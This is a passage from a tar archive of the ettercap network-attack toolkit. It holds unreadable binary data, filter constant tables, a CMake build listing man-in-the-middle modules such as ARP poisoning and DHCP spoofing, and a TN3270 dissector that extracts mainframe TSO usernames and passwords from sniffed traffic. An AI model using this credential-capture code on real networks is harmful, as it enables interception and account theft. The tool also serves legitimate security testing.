#x‘ºœe:ñ5¯íþÁS÷¬{×ÖU-··´òæªetö´ç£â]±ðÚCŸÄŸi˜ÞƒåÀ{PÞåêœ>ËàSÇZPsêóeÞGúîA­9hìÂ7)¼O+Ô‘—Ù!ëP£#/åðXqÔÖ_ÃûuT¶^L=;b‰F#5º®i.`;6¦cbÛ‘HîöäÊÞžX‡ß1z45|úqÔö[¨›àçQs¢3}˜Ü|R¨EvO¢6i«ÏB¬bhÝÝ»è¹û7^=㈮qâ¤ÏìÙÓy¤ß1¡Ã¡òZ®9¨=ÿ µá_.=ƒZ#òù{ø;ù6ð¾åT)äb-¾P Ô^UÙëtwPß õ¼íÂÛTRÌö‘òC6×›Šƒª¢x.Þ6ùÌÚšI^„/ÊÊJƆŽm[Ø®í¦Àµ‰–VØ›ßl]âw|šÆÞæToÄ2TÕ’4™mf9ðÞ&Ôô‚bIâDÙ¶“Ú´rÏvmi¤jTé߀ ýŽ©ÈärƒÙÃA ø%ª³&%íÓ¨ê\po­ÕŠÙ¸#q ¢*(yñ&²^1S!ÔFÓYýÿ]‹*ž­vk5ÂÙ‡*Ü·Šž…<òâ‡vÔì/É‹×kfP’¼ˆ¼Ó4M/+Ž74´iá86ŽkcFÛê·®)ÆÍŸ¦²7YØÿ"§±tK"–~I^Dþ´¡’–_ßÑ«fÔ¾< Ê—£œ‹Q áó=’–II–½©Î®@-îž”æñø^~§Å0ò’o^§´g-çäEä] `„JÊ"uF H,ÇrLlÇ" `¥Œ­ ;š6ùãMA­ù$C+%(„È¿“ÅÞˆ]‹Úß*eW‡ÂBMU{اãïK¦f×EÀgPÉK>–}y½>%yy+/›KC«Ê‚}‘wÁP0RZV2N׃¤Ó)l7†C0 ½)õZ*•.Äšþ^MDmZ)‹¨…(\I¼?p³©—âmôv¢F\üJ\ŠU/²Gס„PU«þ¼ÿ—L”ù@ñš”dí:‘‘w‘p¸,ŽÑL%p±Ðu‡’Ò Ö¼ÖXlë]Dze„(lSPeÎ]2ïÄ3P Ò娑€#QóñUÌE%LÇQ¼ Ô.ä"36Å?â–+¨=Ò>Aq=7 µTr¡ËÚu É‹È»ŠÊòÚ²ò²ÑØ2Sýë]4‚F´}ˆËüŽ/ üèÑBxwjšŠFæÔj—ôKQIÌW€+|Þ·ƒj E3<^¡ÐFÛPHâr`!T‘…›üdJQ¿×bE-z’¼ˆ¼«®©˜\-)7¦™×E7tbΛ»[¥*‹"×Âý¯¡ØßÃÙ糆óyBN4Ô&‡7ûÈP#¨Å²Óˆ#k^DÞÕÔTN2©TË6Áu †B46t/vlÇö;>!„„ÅÞ^W¹g ‘™s€/Q¼£R!Šwúçˆ É‹È»Êê²YÁ@€D*ŽM4“H¸Äܺ¾áU¿cBˆ0”él"¿ä÷34ÀWyë^=Å&€´Ÿ}%'_ä]UuùL]LÅq\Ípplc×î]-ýŽM! €IþÖÎ…P{¦ ¦Yó2@Ã{Å)©LõVïCíÈ^̪kÁW²æEäUyEÙèšÑåÓ5’f\›@@'Þcmèêìmñ;>!„(qTu²|Ø|Õ;ØdUmlkžb*tp?ªúZê ïqQë – ¥’÷Õüêû]Œ£WA`3ÿ½‹<äEäUMMÅ´ªÊÊñ–m’6S¸8‚!:ëRÉtÖ60Bˆ"Ö†ªd–[Qû· Fª+íeÿâÐçDÎÙÛÝßÿì¼häv—õkò;-’¼ˆ¼5¦zf¸$\’J'°ì®k ‡Ýæ†ö~Ç&„âIÔ¦ùÆsèF™ŽjØí!‹»d1ƒZ·q¨ŠSЃ:oB•Ï¡ÿ.ªmšFlå«¢W)j“i—C”é¨Q—Fd[ßHò"òjlí¨‘pÈhëéÀqL4 #ÔÞ´§}‹ß± !„GöNyÉf‰d µÓø¯É_³ã? Öf¬¡ÚORXE/E¬1^ <|ŠÁ÷:œü •,AXOôÔJùRü˜Ã¡§„EÕÀ;sVQÈû´HI^DÞhš¦[=[74âÉ>×FÓÀ±Íõ~Ç'„8l$PΡ̹7€î}þwjÿ¾å“E믹Ï'€Và1à—@lq UÕ>ØÂr•´ õ{…Z¸]5È{'"å´”¼ÌpµV(Ÿ ß`p–‡÷ŽGìï+ï{\Iò"ò¦¼¼tLmí虎ëJÅÑ4Ý0HôZ[e±¾"~‹ê1Ì41P‰O_ÿÏß ÜJF¼&/&ªa6ðß1Tã)_SÅöeámjŽ×÷L Ãã{§¡yÆ©)t&ƒ'/Í@}Σy»¨ïø`mc©Ö»¯¨Ç÷e­óC’‘7£Gš\QošiL+ ÖÆÞÕ®ëÊ8!D¾lžÉÒg­ê+ÙS&sªíÅ àËÀm¹ §hxmð;ø³(>åñ¸TÕ1¡xý½f-á“äEä͘ښ9•Õå£zâØŽšK8±w×·Èb}Q(jKé¨Ý.T/ýn?ƒÊ’\6NCM·¨@-è^ j#ò+‰·Nž Þ§Jù¡õìêÉñN.óøÞ¬M”›·È‹h´¤jü¤±GÙNšd2š ¸$úXÛÚܹËïøDQÑÉ~¯×;PëŽCõ¤êý¯pðGàÂ,3ß‚d÷ž_‚ªôÔœþ*y0P#7?%‹9mÔB_/æ¢bb¨6odð~ø*©ŸŸ“ˆÄpÅñ>m¬;ÿb?ø*‰É¥Ó€_ã<¾M¶,É‹È‹Q£«¦L˜0jA2'm§Ð\# ¹¡÷U×q uj‰È/¯S4²[é¥5²2êï©CÍY¯Îâqó-@vïù®ä=WïÎâ1Åâ­UÀeê/ÄP¥€‡È|êáù¨挬G4r¸äÍËlÔ‚—gK*ly0ðü4?gðjxCuðW2Kij¶D@’‘&=¶¼²¤&–Œá`ã¸áPØnØÞþºß±‰‚aã­¤h•LdËIÀ©Þw6êWh¼&ÿ£ÉÞhC•” ÖûA­!ÊÇüuµ‰àkÀ1¹ Gždh…Žþx_vÃ)x^ïzï®yÀ7€G¼þš—4*©~?jtüPs™  FÛÿ„ZêUx-[AHò"òbòÔq'Äâ1ÀÅv-;°sÇÖ¦b®Ò#²+·i?ªüh6h¨P/÷ÂR²ûȯ €Ç¡öXȆ9¨©W^Tã­A õx/ç;Õsxr΢#]pC›Ë?µ)âç(Ì)H¹àu4¥“Ë@Ø[î>ÔÚ¼L:¦ö>/{Ïõu¨MoÇgásKï?$óWuYˆäEäA0O™:îøtÚìßߎΪ|.æ…m`³?/ŽÇÛBÙÁL`ð©O s³¹&¼5 JÉÞT©Ëñþ0ÌçÞ õd¶úTsAN¢‡ƒ×Pà¡T«¾ÜÅá±Ëk5¯JÔ=&£“Q¿¯‡Qç~Á>c`=d±xjÝæÔa|ÆÄþÏøCû½ÜƒÚ++$y97¶vôôºq5sãñ8–“Í$Ôhoî[n¦­‘XªÔ¢0¹…®U½Ç‹y¨áÃíÑÿ,0Ëã{»Èoå,¯vâ}­Çdžy¼“PÓ+¼ö·’¿fiõÂYÀ€+³Ž8LüøªÊ^¦ÂÀ-ýŸ11›A F¼Oíü(jÝF¶ŒFÝï¾ÉÐ’–¹ªx™K— ŠÒÌÂÏ ü¡Os\ˆš–—µuLÅvòEš6c©%ÑpU{s+Žaâ¸6`0¹k[ó¿cË‘JÔT”BÙüm †nÔã‡ÂL®\TùQ—ÁÏ›šwAU;©ÇÛÆfÕ°¦ ’Ÿ3ˆo#êüšFTãe2ðTIè…¨izƒõ„|KsQS,¼Îu6ÉïŽÀ¿PÕã2霛‚êU< u~v£Î‹‰ºVrÝXqû%Š“ƒºµ¢FQ2¢£W£¦Ã~xõ½ËöÂõÏøì|Ûl&yxo ê\Î@M¯k óç– ”×¢JÞÏ%;SX ²¸[|…ºÏ}ï•¿.~‚÷iÂûkFM5ËjÇŸ$/"çfÌš|ºeÙÄ“q4Íŵ-l;Üؼ§s›ß±åÈñ¨…œPXÉK õðxÕӼݷˆîTƒÚK ýjó·+Õ@‡žº1ðÀƒš.”é¢ÿWúQhvËP%½X€ªv´õèCŒì»ÊQ ËlT£Â«6àå ÞŸ O ˜LŒBM'ù °5Òögà)TEQßËl"é¨ïüTB¹1ËŸ/òÃþêLø)C+q,jzÍ*TcÝÄûÞ#ƒÑPÿxŒ¯KÉoÒœ@ÝÎõøþ(jœw£îñí¨x½Œ*Q¨ÊQû[}‰ü¶W ÎÅ,Û{ùa*±ø*‰ùOÔ(×PÏ»¯2ôÄeðITrœ’¼ˆœš:mâ‰Á€QKö¡éŽkéNKcoÖvZCv*pŠßAÀ£Àƒ~±MÀZ5¡|éD=t¼.Üχ_~îãô$ð†7º¨í÷g>Ô·¢zà󡦶ŽDM¨©†ßBí»Q¨nCMuÎu¯òZœ¥P{òêÚ¿ø êwò?¨$f8ÓìžC-ìÏi‚*É‹È™@ÀM>þä”&‘êÝÅqM¡P¬qgçz¿ã”£*šêfšµšðÃЋj|lò;¢¦ªxÝ´2—žF%|~{ õ }Ìï@2t"¹Ÿ 9` (Á`4¤Í©ªWû3x¯²•oQò?Ò·µIl1Ͼkáí~‹Z'“ó©ÂròEÎŒ]=©¶nÔüx:Žé¤ÐuÛqЉ475tmö;>Fáî¼5/ÚÏê^6jÚÓ?|Œ!ð]ÔbL?m@Í•îð9Ž[€ëQ;B‹¼­È†.¼M‰s)Ì5_…ÎB5ê>Âð¦1æR¹Çü+j½M!t¶ xƒâ.˜10E× ¿íûNÔhñmäé™-É‹È™ ëæWÕ”M%{±µè®æèÕÖv¶õe²‘œÈ…ÓÀ<'QEvúpl øð oýÍ¡$Q½¼Ÿ¸7£*À­ôá؇҂:/wPØÓÿ$È_¯t;Þl§P14ïÅß©”“ÏûlTòòß mœlƱÕYvªRá`\ kŠî€) )ò·Öp#ª@ÅÏÈã½U’‘3ÓgL:ÕrL½/Ù8¸®piÛ“(ä…χ“^µ±ý=Šê±|#ÇlC•wü<Ź÷Fj±úwÉorú2jÉóyP²Ï‹È‰ÚºÑ3ÇMs\O²ËJ.ÑH§MB›wïè,„…ØC1ª‹€z`þ5-ªXìF•ô|¸µÌ`ô0?·Õ˜X†J\ž$?%qóåߨ‘Ëw¢6Á›Âðö(pP¿õ¨Q–ã}·æBñ*¾Õë:ƒ·wæEØ»î$L~ÊŠ¯DMUÌú¦nƒx Õûýu`æ~·•Ìç½wu‹?DM%» UñiªÒ\¾´£¦—ÞIaL]Z›v>jãáÓYdwí×rԨ׽¨©bÒ‡Z»Ñ \Ç[7åíE•.´µ:2Pøf7êž26KŸ» ÕYõ{ü)ƒHò"rdμéçiš[ޡ麦áº&foxCg[ßþ"‹ß²w—âb20å¥ÕÛü…Ñã7Kû_¿C5Âg£v~¯A5>½ÜL]Ôtªí¨ÄegÿŸ#u1r7ðwÔC{zÿkªÎ¿×$FCõº7¢×;È|úU!Yj°ÏCmh9• GPÏFµ_ ¨ï/Q勳}ý§P½ÍÛQצ_S³þ†JB/F}G@ª=IaTþ‰Ö÷¿þLC÷iÀ(²¿ ¢†ºÇõ¢®Ýu¨M é¾g£*.D]ÓQ×ædTÁû}Ô¿9U\Ž-ñR4¡µýƒÀ9¨Ž‹.àYT‡M1@þuOùÃßüôÔhÎâa~ΰIò"². „ç-˜~U<™ žì%ÖÐt# ÑÝä¼i™V!×¼?”ÛP7Mßz†h yIS|±LCÿk`®võïìß7ðžbýG5Ä?0Ì@U¥ñòHÚ ©¡“ 6ªÁ>0rdô¿®™ïÔ4Èþ5äP8çuEÿk á\ÌS'‹ISÿk Q ûÓúî}&…ÿpQ##›Q£‚{ÏI¦ëÏÔý>Ó‘’$jTùqÔóÅkIñB´•¬Þˆš2[—áϯDÍÔ¸)Ú!ɋȺ³¦œV7®êÄ®x–›$Zb`¸Ñhˆ õ]+\·àoœSL½-‡›Ã1.‹Âi4 ›7P¯†üáôo-Dr]¾ÕÁ®Ë|pÏþéc.ŽÆ£Êdïß&sQkïv£êçÉ_O$yYwäѳßëhn4‘Jb„tBÁ 8it=нgWG1lö'„B1’X¨Qä ¨¬jTißäe`„.N'Ñ’¼ˆ¬š4yÂQ³çM¿¢7–¢/ÖC <…ÐÑ\HÄôm1?7B!„8ܹ¨©ÄEY F’‘5†¡N<í¨'ÍÞñ½}ˆ*³IZ 4\q£¡§3ž2ˆB!„b’äEdMeUEíä5ïL¦{¨›Xɵﻙ{ +·¾Lý¦­´tÚÌ´=æŽ !„BHò"²fìؚ饥Áqe”—U°tí3Ô7m$–è"èDb[VîyÚï…B!Dñ’äEdMeuÙD#@¨4ZJóžvêÖ¡Gl,-F²+ôŠ׶?ïwŒB!„¢xe»Ž¸8ŒEËBcõ¸ŽNOO7®f¢‡‚aÍ+;0M[ÊÙ !„Bˆ!“äEdMeUt’ÐI¥ÒX$ ”h [¸vpçê%»÷;>!„BQÜ$yY¡išV3º|¶€x²M· † tÃ¥a}òþîÎx³ß1 !„Bˆâ&É‹ÈŠ’h¤¢¢ºd&šC_¬#láê6®«÷¬YÒt¯ßñ !„Bˆâ'É‹ÈŠ±µÕ3K+B“lÇ&N®MW“óâŽ-m+ýŽO!„B?I^DVŒWud0¢EÓ©¶k¢‡ 4{ûš®GÓ)KövB!„Ã&É‹ÈŠÚqU'†B†%Ð Ðup,}÷¦Õ-/ú›B!„dŸ1láH¨|L]Ù1†±XœPDG7lzÚx£iW÷f¿ãB!„(B.`ûD¡‘‘1lã'ŒZ0º¶tN*eaÙ¡h€`Dcûº®§]×uýŽO!„¢%€>ï5rH!‘äE Û”éµg–U…GÅû’Ã:F -вieËó~Ç&„BQ¤â@·Ç÷ÆrH!‘äE K0ˆL˜R}¶ãºX¦Kiy=hÑÛ®-n¨o—)cB!„Cc«<¼¯ X’ãX †$/bXÆÖUÏ©›Tqj*iSVZJY™A( [Vv?ìwlB!„Eî>`é ïù °)±I^Ä°Ì=bÒ•^ ”ÊÑå §1ÌpýÊ×êŸñ;6!„Bˆ"·øðÒþ.܉J^›5ÆRmL Y$.›½`ì»Ó —Ú‰£‰–ÇéŒ94×;77v7øŸB!Ä° ¸¸¸(6‹QÓË’¼ˆ!›Ä´ ¢e‘# Ê7¡ŠŽD3FbÕ’†‡¤Ê˜B!DÖì~Óÿ:¬É´11dsœ|M2æ0fL-å5}‰NâÝ7Ö¯l8l !„Bˆü‘äE Imݨ™U£KÎ4Œ0“§ÔaÑG2iÚ[V÷>ÐÛ÷ZÖO!„BÏ$yC2gÞÔ³uÝ\]5†ÑãÊéìÞƒïyíÅReL!„Bä„$/"c†¡¦Î¬½ÄLëÚø µè¡mííìÞf>±gwë¿ãB!„#“,Ø›8©îÈÊê²³5-DÝÄJú-$㶹|Ѷú›B!„¹däEdlö¼);Ž3fÔ¨ ªFhïl¡}·»dݪí‹üŽM!„BŒ\’¼ˆŒ„#¡²©3Æ]íº¦Ö …{éìngåëw§RfÂïø„B!ÄÈ%ÓÆDFfÍ™vNI´ä¸HI€‰ÓËéŽ5Ñ´«oãšåõOú›B!„ÙdäEddî‚iï5MÓSWJõ˜íl^Ùõ@ks×.¿cB!„#›$/³ںÑsÆÖV]h\&N¯@7lv×wíYòRýßýŽM!„BŒ|’¼ϦNŸxŽ¦¹c+j‚Lš1–žžnV½Öü@C}ë:¿cB!„#Ÿ$/ÂMÓ´qFŸ†‘Ö§ÎÃøºqìªoë]üܶßû›B!„8 image/svg+xml e e e ettercap-0.8.3.1/share/etterfilter.cnt000664 000000 000000 00000002543 13711276346 017627 0ustar00rootroot000000 000000 ############################################################################ # # # etterfilter -- etterfilter.cnt -- constants for etterfilter # # # # Copyright (C) ALoR & NaGA # # # # This program is free software; you can redistribute it and/or modify # # it under the terms of the GNU General Public License as published by # # the Free Software Foundation; either version 2 of the License, or # # (at your option) any later version. # # # ############################################################################ # # # # ############################################################################ # Layer 3 constants ARP = 0x0806 IP = 0x0800 IP6 = 0x86DD PPPOE = 0x880B PPTP = 0x880B # Layer 4 constants (IPPROTO_*) ICMP = 0x01 ICMP6 = 0x3a ESP = 0x32 TCP = 0x06 UDP = 0x11 GRE = 0x2f OSPF = 0x59 VRRP = 0x70 # EOF ettercap-0.8.3.1/share/etterfilter.tbl000664 000000 000000 00000007313 13711276346 017624 0ustar00rootroot000000 000000 ############################################################################ # # # etterfilter -- etterfilter.tbl -- virtual pointers for etterfilter # # # # Copyright (C) ALoR & NaGA # # # # This program is free software; you can redistribute it and/or modify # # it under the terms of the GNU General Public License as published by # # the Free Software Foundation; either version 2 of the License, or # # (at your option) any later version. # # # ############################################################################ # # # # ############################################################################ # # ethernet is at layer 2 # [eth][2] dst:6 = 0 src:6 = 6 proto:2 = 12 # # token ring is at layer 2 # [tr][2] ac:1 = 0 fc:1 = 1 dst:6 = 2 src:6 = 8 dsap:1 = 14 ssap:1 = 15 control:1 = 16 orgcode:1 = 17 proto:2 = 20 # # fddi is at layer 2 # [fddi][2] fc:1 = 0 dst:6 = 1 src:6 = 7 dsap:1 = 13 ssap:1 = 14 control:1 = 15 orgcode:1 = 16 # split proto because it is not aligned proto1:1 = 19 proto2:1 = 20 # # wireless header at layer 1 / 2 # [wifi][2] type:2 = 0 ttl:2 = 2 dst:6 = 4 src:6 = 10 bssid:1 = 16 seq:2 = 17 # # we identiy arp protocol at layer 3 # because it is onto a layer 2 (ethernet) # [arp][3] hw.fmt:2 = 0 proto.fmt:2 = 2 hw.len:1 = 4 proto.len:1 = 5 op:2 = 6 src.hw:6 = 8 src.addr:4 = 12 dst.hw:6 = 16 dst.addr:4 = 22 # # IP is at layer 3 # ihl and version are 4 bit each, but we have # to collate them in a single byte. # [ip][3] ihl_ver:1 = 0 tos:1 = 1 len:2 = 2 id:2 = 4 frags:2 = 6 ttl:1 = 8 proto:1 = 9 csum:2 = 10 src:4 = 12 dst:4 = 16 # IPv6 is at layer 3 # version ,traffic class and flow label are 4 bit and 8 bit and 20 bit, but we have # to collate them in 4 bytes # [ipv6][3] ver_tc_fl:4 = 0 # Version (4 bit), Traffic Class (8 bit), Flow Label (20 bit) len:2 = 4 # Payload length nh:1 = 6 # Next header (a.k.a. proto e.g. TCP, UDP) hl:1 = 7 # Hop limit (a.k.a. TTL in IPv4) src:16 = 8 dst:16 = 24 # # we identify icmp protocol at layer 4 # because it is onto a layer 3 (ip) # id,seq overlap gw and mtu (they are in a union) # [icmp][4] type:1 = 0 code:1 = 1 csum:2 = 2 id:2 = 4 seq:2 = 6 gw:4 = 4 mtu:2 = 6 # # GRE is at layer 4 # [gre][4] flags:2 = 0 proto:2 = 2 # # ESP is at layer 4 # [esp][4] spi:4 = 0 seq:4 = 4 # # tcp is at layer 4 # [tcp][4] src:2 = 0 dst:2 = 2 seq:4 = 4 ack:4 = 8 offset:1 = 12 flags:1 = 13 win:2 = 14 csum:2 = 16 urg:2 = 18 # # udp is at layer 4 # [udp][4] src:2 = 0 dst:2 = 2 len:2 = 4 csum:2 = 6 # # special case for tcp/udp payload. # it is parsed as layer 5 # # the size is set to 1 to represent the first byte, # but 'data' is the entire buffer # [DATA][5] data:1 = 0 # # some dissectors will decode/decrypt the data # into a special buffer displayed to the user. # if you want to search in this buffer, use this table. # # the size is set to 1 to represent the first byte, # but 'data' is the entire buffer # [DECODED][6] data:1 = 0 # EOF ettercap-0.8.3.1/share/etterlog.dtd000664 000000 000000 00000001654 13711276346 017114 0ustar00rootroot000000 000000 ettercap-0.8.3.1/src/000775 000000 000000 00000000000 13711276346 014251 5ustar00rootroot000000 000000 ettercap-0.8.3.1/src/CMakeLists.txt000664 000000 000000 00000012564 13711276346 017021 0ustar00rootroot000000 000000 set(EC_SRC ec_asn1.c ec_mem.c ec_capture.c ec_checksum.c ec_conf.c ec_connbuf.c ec_conntrack.c ec_debug.c ec_decode.c ec_dispatcher.c ec_dissect.c ec_encryption_ccmp.c ec_encryption_tkip.c ec_encryption.c ec_error.c ec_exit.c ec_file.c ec_filter.c ec_fingerprint.c ec_format.c ec_globals.c ec_hash.c ec_hook.c ec_inet.c ec_inject.c ec_libettercap.c ec_log.c ec_manuf.c ec_mitm.c ec_network.c ec_packet.c ec_passive.c ec_plugins.c ec_poll.c ec_profiles.c ec_redirect.c ec_resolv.c ec_scan.c ec_send.c ec_services.c ec_session.c ec_set.c ec_signals.c ec_sleep.c ec_sniff_bridge.c ec_sniff.c ec_sniff_unified.c ec_socket.c ec_sslwrap.c ec_stats.c ec_streambuf.c ec_strings.c ec_threads.c ec_ui.c ec_utils.c dissectors/ec_bgp.c dissectors/ec_cvs.c dissectors/ec_dhcp.c dissectors/ec_ftp.c dissectors/ec_gg.c dissectors/ec_http.c dissectors/ec_icq.c dissectors/ec_imap.c dissectors/ec_irc.c dissectors/ec_iscsi.c dissectors/ec_kerberos.c dissectors/ec_ldap.c dissectors/ec_mdns.c dissectors/ec_mongodb.c dissectors/ec_mountd.c dissectors/ec_msn.c dissectors/ec_mysql.c dissectors/ec_nbns.c dissectors/ec_nntp.c dissectors/ec_o5logon.c dissectors/ec_ospf.c dissectors/ec_pop.c dissectors/ec_postgresql.c dissectors/ec_portmap.c dissectors/ec_radius.c dissectors/ec_rcon.c dissectors/ec_rip.c dissectors/ec_rlogin.c dissectors/ec_smb.c dissectors/ec_smtp.c dissectors/ec_snmp.c dissectors/ec_socks.c dissectors/ec_ssh.c dissectors/ec_telnet.c dissectors/ec_TN3270.c dissectors/ec_vnc.c dissectors/ec_vrrp.c dissectors/ec_x11.c dissectors/ec_ymsg.c mitm/ec_arp_poisoning.c mitm/ec_dhcp_spoofing.c mitm/ec_icmp_redirect.c mitm/ec_port_stealing.c protocols/ec_arp.c protocols/ec_cooked.c protocols/ec_erf.c protocols/ec_eth.c protocols/ec_fddi.c protocols/ec_gre.c protocols/ec_esp.c protocols/ec_icmp.c protocols/ec_ip.c protocols/ec_mpls.c protocols/ec_null.c protocols/ec_ppi.c protocols/ec_ppp.c protocols/ec_pppoe.c protocols/ec_rawip.c protocols/ec_tcp.c protocols/ec_tr.c protocols/ec_udp.c protocols/ec_vlan.c protocols/ec_wifi.c protocols/ec_wifi_eapol.c protocols/ec_wifi_prism.c protocols/ec_wifi_radiotap.c ) if(HAVE_GEOIP) set(EC_SRC ${EC_SRC} ec_geoip.c) endif() if(ENABLE_IPV6) set(EC_SRC ${EC_SRC} protocols/ec_icmp6.c protocols/ec_ip6.c mitm/ec_ip6nd_poison.c) endif() if(HAVE_DN_EXPAND) set(EC_SRC ${EC_SRC} dissectors/ec_dns.c) endif() if(OS_LINUX) set(EC_SRC ${EC_SRC} os/ec_linux.c) elseif(OS_BSD) set(EC_SRC ${EC_SRC} os/ec_bsd.c) elseif(OS_DARWIN) set(EC_SRC ${EC_SRC} os/ec_darwin.c) elseif(OS_MINGW) set(EC_SRC ${EC_SRC} os/ec_mingw.c) elseif(OS_SOLARIS) set(EC_SRC ${EC_SRC} os/ec_solaris.c) elseif(OS_GNU) set(EC_SRC ${EC_SRC} os/ec_gnu.c) endif() if(NOT HAVE_STRLCAT AND NOT HAVE_STRLCAT_FUNCTION) set(EC_SRC ${EC_SRC} missing/strlcat.c) endif() if(NOT HAVE_STRLCPY AND NOT HAVE_STRLCPY_FUNCTION) set(EC_SRC ${EC_SRC} missing/strlcpy.c) endif() if(NOT HAVE_STRSEP) set(EC_SRC ${EC_SRC} missing/strsep.c) endif() if(NOT HAVE_STRCASESTR) set(EC_SRC ${EC_SRC} missing/strcasestr.c) endif() if(NOT HAVE_MEMMEM) set(EC_SRC ${EC_SRC} missing/memmem.c) endif() if(NOT HAVE_MEMRCHR) set(EC_SRC ${EC_SRC} missing/memrchr.c) endif() if(NOT HAVE_BASENAME) set(EC_SRC ${EC_SRC} missing/basename.c) endif() if(NOT HAVE_STRNDUP) set(EC_SRC ${EC_SRC} missing/strndup.c) endif() if(NOT HAVE_GETOPT_LONG AND NOT HAVE_GETOPT_H) set(EC_SRC ${EC_SRC} missing/getopt.c) endif() add_library(lib_ettercap SHARED ${EC_SRC}) add_dependencies(lib_ettercap libnet) target_link_libraries(lib_ettercap ec_interfaces ${EC_LIBS}) if(CURL_FOUND) target_link_libraries(lib_ettercap ${CURL_LIBRARY}) endif() if(NOT LIBRARY_BUILD) add_subdirectory(interfaces) include_directories(interfaces/daemon interfaces/text) if(ENABLE_CURSES) include_directories(interfaces/curses interfaces/curses/widgets) endif() add_executable(ettercap ec_parser.c ec_main.c) target_link_libraries(ettercap lib_ettercap ${EC_LIBS}) if(NOT DISABLE_RPATH) set_target_properties(ettercap PROPERTIES INSTALL_RPATH ${INSTALL_LIBDIR}) endif() endif() # Only compile lua stuff if lua is enabled! if(ENABLE_LUA) add_subdirectory(lua) target_link_libraries(lib_ettercap ec_lua ${LUAJIT_LIBRARY}) if(OS_DARWIN AND (CMAKE_SIZEOF_VOID_P EQUAL 8)) # On 64-bit OSX platforms, luajit requires the following flags to be added. # See: http://luajit.org/install.html target_link_libraries(ettercap "-pagezero_size 10000 -image_base 100000000") endif() endif() #if(NOT LIBRARY_BUILD) #target_link_libraries(lib_ettercap ec_interfaces ${EC_LIBS}) #else(NOT LIBRARY_BUILD) #target_link_libraries(lib_ettercap ${EC_LIBS}) #endif(NOT LIBRARY_BUILD) set_target_properties(lib_ettercap PROPERTIES ENABLE_EXPORTS On # LINK_INTERFACE_LIBRARIES "" OUTPUT_NAME ettercap VERSION ${VERSION} SOVERSION 0 ) install(TARGETS lib_ettercap DESTINATION ${INSTALL_LIBDIR}) if(NOT LIBRARY_BUILD) install(TARGETS ettercap DESTINATION ${INSTALL_BINDIR}) endif() ettercap-0.8.3.1/src/dissectors/000775 000000 000000 00000000000 13711276346 016433 5ustar00rootroot000000 000000 ettercap-0.8.3.1/src/dissectors/ec_TN3270.c000664 000000 000000 00000011570 13711276346 020107 0ustar00rootroot000000 000000 /* ettercap -- dissector for Mainframe TN3270 z/OS TSO logon protocol Copyright (C) Dhiru Kholia (dhiru at openwall.com) Based on MFSniffer (https://github.com/mainframed/MFSniffer) Created by: Soldier of Fortran (@mainframed767) (tested against x3270 and TN3270 X and TN3270 Plus) This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation; either version 2 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program; if not, write to the Free Software Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA. */ #include #include #include #include /* protos */ FUNC_DECODER(dissector_TN3270); void TN3270_init(void); /************************************************/ /* * this function is the initializer. * it adds the entry in the table of registered decoder */ void __init TN3270_init(void) { dissect_add("TN3270", APP_LAYER_TCP, 623, dissector_TN3270); } /* Function to convert EBCDIC to ASCII */ static unsigned char e2a[256] = { 0, 1, 2, 3,156, 9,134,127,151,141,142, 11, 12, 13, 14, 15, 16, 17, 18, 19,157,133, 8,135, 24, 25,146,143, 28, 29, 30, 31, 128,129,130,131,132, 10, 23, 27,136,137,138,139,140, 5, 6, 7, 144,145, 22,147,148,149,150, 4,152,153,154,155, 20, 21,158, 26, 32,160,161,162,163,164,165,166,167,168, 91, 46, 60, 40, 43, 33, 38,169,170,171,172,173,174,175,176,177, 93, 36, 42, 41, 59, 94, 45, 47,178,179,180,181,182,183,184,185,124, 44, 37, 95, 62, 63, 186,187,188,189,190,191,192,193,194, 96, 58, 35, 64, 39, 61, 34, 195, 97, 98, 99,100,101,102,103,104,105,196,197,198,199,200,201, 202,106,107,108,109,110,111,112,113,114,203,204,205,206,207,208, 209,126,115,116,117,118,119,120,121,122,210,211,212,213,214,215, 216,217,218,219,220,221,222,223,224,225,226,227,228,229,230,231, 123, 65, 66, 67, 68, 69, 70, 71, 72, 73,232,233,234,235,236,237, 125, 74, 75, 76, 77, 78, 79, 80, 81, 82,238,239,240,241,242,243, 92,159, 83, 84, 85, 86, 87, 88, 89, 90,244,245,246,247,248,249, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57,250,251,252,253,254,255 }; static void ebcdic2ascii(unsigned char *str, int n, unsigned char *out) { int i; for (i = 0; i < n; ++i) out[i] = e2a[str[i]]; } FUNC_DECODER(dissector_TN3270) { DECLARE_DISP_PTR_END(ptr, end); unsigned int i; char tmp[MAX_ASCII_ADDR_LEN]; //suppress unused warning (void)end; (void) DECODE_DATA; (void) DECODE_DATALEN; (void) DECODED_LEN; if (FROM_CLIENT("TN3270", PACKET)) { if (PACKET->DATA.len > 200 || PACKET->DATA.len < 5) /* is this always valid? */ return NULL; char output[512] = { 0 }; char username[512] = { 0 }; char password[512] = { 0 }; ebcdic2ascii(ptr, PACKET->DATA.len, (unsigned char*)output); /* scan packets to find username and password */ for (i = 0; i < PACKET->DATA.len - 5; i++) { /* find username, logons start with 125 193 (215 or 213) 17 64 90 ordinals * We relax the check for third byte because it is less error-prone that way */ if (ptr[i] == 125 && ptr[i+1] == 193 && /* (ptr[i+2] == 215 || ptr[i+2] == 213) && */ ptr[i+3] == 17 && ptr[i+4] == 64 && ptr[i+5] == 90) { /* scan for spaces */ int j = i + 6; while (j < 512 && output[j] == 32) j++; if (j==511) /* Don't even bother */ continue; strncpy(username, &output[j], 512); username[511] = 0; /* Boundary */ int l = strlen(username); if (l < 2) return NULL; username[l-2] = 0; DISSECT_MSG("%s:%d <= z/OS TSO Username : %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), username); } /* find password */ if (ptr[i] == 125 && ptr[i+1] == 201 && ptr[i+3] == 17 && ptr[i+4] == 201 && ptr[i+5] == 195) { strncpy(password, &output[i + 6], 512); password[511] = 0; /* Boundary */ int l = strlen(password); if (l < 2) return NULL; password[l-2] = 0; DISSECT_MSG("%s:%d <= z/OS TSO Password : %s\n", ip_addr_ntoa(&PACKET->L3.dst, tmp), ntohs(PACKET->L4.dst), password); } } } return NULL; } // vim:ts=3:expandtab ettercap-0.8.3.1/src/dissectors/ec_bgp.c000664 000000 000000 00000016712 13711276346 020025 0ustar00rootroot000000 000000 